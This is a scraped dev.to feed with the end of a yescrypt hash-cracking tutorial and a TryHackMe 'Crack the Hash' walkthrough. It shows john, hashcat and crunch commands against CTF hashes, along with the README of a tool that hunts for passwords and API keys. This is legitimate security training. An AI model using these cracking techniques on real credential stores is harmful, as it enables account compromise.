class="o">=</span>crypt <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt hash.txt </code></pre> </div> <p>Check results:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>john <span class="nt">--show</span> hash.txt </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb1se6hcn0ourtafoycuy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb1se6hcn0ourtafoycuy.png" alt=" " width="800" height="513"></a></p> <h2> Step 3: When Dictionary Attack Fails </h2> <p>If the password is not present in the wordlist, more advanced techniques are required.</p> <h3> 1. Sequential brute force (incremental attack) </h3> <p>This method tries all possible combinations:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>john <span class="nt">--format</span><span class="o">=</span>crypt <span class="nt">--incremental</span> hash.txt </code></pre> </div> <h3> 2. Custom wordlist generation using Crunch </h3> <p>Crunch allows generation of targeted wordlists instead of random brute force.</p> <p>Basic syntax:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>crunch &lt;min&gt; &lt;max&gt; &lt;charset&gt; <span class="nt">-o</span> wordlist.txt </code></pre> </div> <p>Examples:</p> <p>Numeric-only wordlist (4–6 digits):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>crunch 4 6 0123456789 <span class="nt">-o</span> numbers.txt </code></pre> </div> <p>Lowercase alphabet wordlist (3–5 characters):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>crunch 3 5 abcdefghijklmnopqrstuvwxyz <span class="nt">-o</span> alpha.txt </code></pre> </div> <p>Mixed pattern wordlist:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>crunch 6 6 abcdef123 <span class="nt">-o</span> custom.txt </code></pre> </div> <h3> 3. Use custom wordlist with John </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>john <span class="nt">--format</span><span class="o">=</span>crypt <span class="nt">--wordlist</span><span class="o">=</span>custom.txt hash.txt </code></pre> </div> <h2> Summary </h2> <ol> <li>Start with dictionary attack using <code>rockyou.txt</code> </li> <li>Apply rule-based mutations </li> <li>If unsuccessful, use custom wordlists (Crunch) </li> <li>Use incremental brute force only as a last resort </li> <li>Always prioritize contextual password guessing over blind attacks </li> </ol> <h2> Key Insight </h2> <p>Yescrypt is designed to resist brute-force attacks. Effective cracking depends not on raw computation, but on <strong>intelligent wordlist construction and contextual analysis</strong>. This is why dictionary-based attacks remain the most practical method in CTFs and security testing environments.</p> cybersecurity password linux hash Md. Ibrahim Reza Rabbi Sun, 19 Apr 2026 09:04:19 +0000 https://dev.to/ibrahim71reza/offline-hash-cracking-tutorial-crack-the-hash-room-walkthrough-tryhackme-9be https://dev.to/ibrahim71reza/offline-hash-cracking-tutorial-crack-the-hash-room-walkthrough-tryhackme-9be <p>Can you complete the level 1 tasks by cracking the hashes?<br> <strong><em>Question-01:</em></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Hash: 48bb6e862e54f2a795ffc4e541caed4d </code></pre> </div> <p>Identifying the hash type (tools used -&gt; "haiti" , "hash-identifier" , "hashid" )</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3pw7l881ops9g89hh5yh.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3pw7l881ops9g89hh5yh.png" alt=" " width="800" height="321"></a></p> <p>All indicating MD5 (mode 0)</p> <p>Now, put the hash text in the hash.txt file</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgr2qh7o3mf9xo4zq72za.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgr2qh7o3mf9xo4zq72za.png" alt=" " width="800" height="246"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wzzyq6hlz3bz6nchm76.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wzzyq6hlz3bz6nchm76.png" alt=" " width="800" height="118"></a></p> <p><strong><em>Question-02:</em></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Hash: CBFDAC6008F9CAB4083784CBD1874F76618D2A97 </code></pre> </div> <p>Let's solve this with "john the ripper" tool</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2csmn97v61o2q51aqsup.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2csmn97v61o2q51aqsup.png" alt=" " width="662" height="373"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgv93u1c06o68areai1uq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgv93u1c06o68areai1uq.png" alt=" " width="800" height="107"></a><br> <strong><em>Question-03:</em></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Hash: 1C8BFE8F801D79745C4631D09FFF36C82AA37FC4CCE4FC946683D7B336B63032 </code></pre> </div> <p>like the 1 -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwl6ymudjx5aviy15kcut.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwl6ymudjx5aviy15kcut.png" alt=" " width="800" height="256"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzg3agybv08vlgjz7fkm0.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzg3agybv08vlgjz7fkm0.png" alt=" " width="800" height="109"></a><br> <strong><em>Question-04:</em></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Hash: $2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom </code></pre> </div> <p>It will take many time if we want to crack it by hashcat blowfish method normally</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feouxhend7oaxd70fmsre.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feouxhend7oaxd70fmsre.png" alt=" " width="657" height="274"></a><br> confirmed “blowfish”<br> Now, this will take long time crack</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp86tq8dpwfhw45y4mnii.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp86tq8dpwfhw45y4mnii.png" alt=" " width="659" height="174"></a></p> <p>So, let’s do brute force as string (Where I don’t know the length and assuming all lowercase letters)</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0849qsfvlvgqyuan5pp3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0849qsfvlvgqyuan5pp3.png" alt=" " width="800" height="107"></a><br> It will also take very much time :’/<br> But , from internet i know the result is “bleh”<br> so, for fast work modify the previous code to show it in short time</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6nxx0jm61y6zw5z2miy2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6nxx0jm61y6zw5z2miy2.png" alt=" " width="379" height="112"></a></p> <p>It will execute the hash very fast as it know the length and 1st 2 characters of hash crack</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp3lnu1eyxf0q9y7oxfib.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp3lnu1eyxf0q9y7oxfib.png" alt=" " width="800" height="108"></a><br> <strong><em>Question-05:</em></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Hash: 279412f945939ba78ce0758d3fd83daa </code></pre> </div> <p>Now, this is mine favorite one among all. From, crack station,</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwk4wlra0be0v8rvwe1fy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwk4wlra0be0v8rvwe1fy.png" alt=" " width="800" height="335"></a><br> Now, I will use mine own create Linux tool which very efficient in password existence finding from wordlists. you can visit this link for more info<br> </p> <div class="ltag-github-readme-tag"> <div class="readme-overview"> <h2> <img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"> <a href="https://github.com/Ibrahim71Reza" rel="noopener noreferrer"> Ibrahim71Reza </a> / <a href="https://github.com/Ibrahim71Reza/password_finder" rel="noopener noreferrer"> password_finder </a> </h2> <h3> </h3> </div> <div class="ltag-github-body"> <div id="readme" class="md"><div> <div class="markdown-heading"> <h1 class="heading-element">🚀 pwfind (Password Find)</h1> </div> <p><strong>The Ultimate, World's Fastest Password and Secret Finder for Huge Wordlists.</strong></p> <p><a href="https://www.rust-lang.org/" rel="nofollow noopener noreferrer"><img src="https://camo.githubusercontent.com/1f88f2ae669e1db4d9c637142d148993bcf3b884e14919b700325a6281c7ba0b/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f4275696c745f776974682d527573742d6632366130303f7374796c653d666f722d7468652d6261646765266c6f676f3d72757374" alt="Rust"></a> <a href="https://kernel.org/" rel="nofollow noopener noreferrer"><img src="https://camo.githubusercontent.com/e45d3f7f855a346289e3d9b526b78c6c702b06eedec6916c8c3d3ce4da7a4776/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f506c6174666f726d2d4c696e75782d4643433632343f7374796c653d666f722d7468652d6261646765266c6f676f3d6c696e7578" alt="Linux"></a> <a href="https://github.com/Ibrahim71Reza/password_finder#" rel="noopener noreferrer"><img src="https://camo.githubusercontent.com/4221a6d4dc2cc8e4e3b1f2b804ec7b46e059fc8e4b20edfa1db2742cbe1b915d/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f546f6f6c2d50656e6574726174696f6e5f54657374696e672d626c61636b3f7374796c653d666f722d7468652d6261646765266c6f676f3d6b616c692d6c696e7578" alt="Pentesting"></a></p> <p><em>Stop crashing your RAM. Start finding secrets instantly.</em></p> </div> <div class="markdown-heading"> <h2 class="heading-element">⚡ Why <code>pwfind</code>?</h2> </div> <p>When penetration testers, bug bounty hunters, or sysadmins work with massive datasets (like a 50GB SecLists dump or massive compressed server logs), standard tools like <code>grep</code> or Python scripts will either bottleneck on CPU, or load the whole file into RAM and crash the system.</p> <p><code>pwfind</code> is written in highly optimized <strong>Rust</strong>. It utilizes multi-threading, memory-safe buffered streaming, and on-the-fly decompression to hunt for exact passwords or regex secrets across millions of lines in a fraction of a second.</p> <div class="markdown-heading"> <h2 class="heading-element">✨ Core Features</h2> </div> <ul> <li>🏎️ <strong>Blazing Fast Concurrency:</strong> Utilizes all your CPU cores to search dozens of files simultaneously.</li> <li>🧠 <strong>Hacker Intelligence (Presets):</strong> Built-in complex Regex patterns to instantly find <strong>JWT Tokens, AWS Keys, IPv4 Addresses, and Emails</strong>.</li> <li>📦 <strong>On-the-Fly Decompression:</strong> Searches directly…</li> </ul></div> </div> <div class="gh-btn-container"><a class="gh-btn" href="https://github.com/Ibrahim71Reza/password_finder" rel="noopener noreferrer">View on GitHub</a></div> </div> <p>Now, if you notice you will see there is no single wordlist which have this password in it</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdr3sf5eyv5vqpsiyi4ha.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdr3sf5eyv5vqpsiyi4ha.png" alt=" " width="533" height="774"></a></p> <p>So, we have to go for a long bruteforce to crack this :) No quick dictionary attack :'(</p> <p>We can use this payload,<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>hashcat <span class="nt">-m</span> 900 <span class="nt">-a</span> 3 hash.txt ?a?l?l?l?l?l?l?l?d?d </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4qoa2d4fs6s6p3xb6907.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4qoa2d4fs6s6p3xb6907.png" alt=" " width="401" height="242"></a></p> <p>This will also take time but will work at the end<br> To ensure you it will work just running a sample case of that code manually,</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1j60z3t83vp8j6kk7ceg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1j60z3t83vp8j6kk7ceg.png" alt=" " width="577" height="135"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7t14g0l3lg9xz37wnt3t.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7t14g0l3lg9xz37wnt3t.png" alt=" " width="361" height="65"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhkhhpw0gi9k47xqt0x0k.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhkhhpw0gi9k47xqt0x0k.png" alt=" " width="800" height="110"></a></p> <p>Okay now, We will jump to the 2nd level of this -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg6i82lhjvxmreakum3y4.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg6i82lhjvxmreakum3y4.png" alt=" " width="754" height="120"></a></p> <p><strong><em>Question-1:</em></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Hash: F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85 </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4924p0shq1bxic7d2lwl.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4924p0shq1bxic7d2lwl.png" alt=" " width="800" height="246"></a><br> Now, lets crack this with SHA-256 mode 1400 by hashcat<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvdjybfveafca856z3axh.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvdjybfveafca856z3axh.png" alt=" " width="614" height="423"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffslicgyjvtisy79zn2qs.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffslicgyjvtisy79zn2qs.png" alt=" " width="616" height="418"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fibdfdlesxywn45jf289h.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fibdfdlesxywn45jf289h.png" alt=" " width="800" height="107"></a><br> <strong><em>Question-2:</em></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Hash: 1DFECA0C002AE40B8619ECF94819CC1B </code></pre> </div> <p>Now, this hash is tricky though it is showing MD5 or any version of MD but it is "NTLM". So, we should not blindly trust the top guess of this tools rather than sequentially test all the hash until we will get the hash cracked.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F33y1clco38tx2kwo5slm.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F33y1clco38tx2kwo5slm.png" alt=" " width="800" height="215"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fox16bl1kqq65mhv5p5hl.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fox16bl1kqq65mhv5p5hl.png" alt=" " width="800" height="243"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8b9s3r4dpeaef6kn0hf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8b9s3r4dpeaef6kn0hf.png" alt=" " width="636" height="386"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdzq1dc58zznl2s5c73r8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdzq1dc58zznl2s5c73r8.png" alt=" " width="800" height="105"></a></p> <p><strong><em>Question-3:</em></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Hash: $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02. Salt: aReallyHardSalt </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3taozp0qixymiibic6nh.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3taozp0qixymiibic6nh.png" alt=" " width="800" height="153"></a></p> <p>Now, it is bit tricky. Go to <a href="https://hashcat.net/wiki/doku.php?id=example_hashes" rel="noopener noreferrer">hashcat_wiki</a> and search the $6$ tag and understand which mode is this. -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbpz5fqyw9ppl7xnb84ih.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbpz5fqyw9ppl7xnb84ih.png" alt=" " width="800" height="106"></a><br> okay now lets crack we don't need to add the salt in the hash manually cause it is attached with that in the hash. But, most of we miss to add the (.) full stop at the end. This full stop is a part of this hash. And also it will take some time to crack -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5edsbhu979uyxs1usayu.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5edsbhu979uyxs1usayu.png" alt=" " width="690" height="346"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2pge42x3dqk00y24cn0b.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2pge42x3dqk00y24cn0b.png" alt=" " width="694" height="403"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc0kjsd0jpplb3hl15yrg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc0kjsd0jpplb3hl15yrg.png" alt=" " width="800" height="161"></a><br> <strong><em>Question-4:</em></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Hash: e5d8870e5bdd26602cab8dbe07a942c8669e56d6 Salt: tryhackme </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0t083ai20yxi5ah2jnt8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0t083ai20yxi5ah2jnt8.png" alt=" " width="800" height="194"></a></p> <p>now if we look at the <a href="https://hashcat.net/wiki/doku.php?id=example_hashes" rel="noopener noreferrer">hashcat_wiki</a> the Sha-1 with salt is the mode 110 and also see the format sha1($pass.$salt) -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F60gjxkny7jtq8hzy58xg.png" class="article-body-image-wrapper"><img 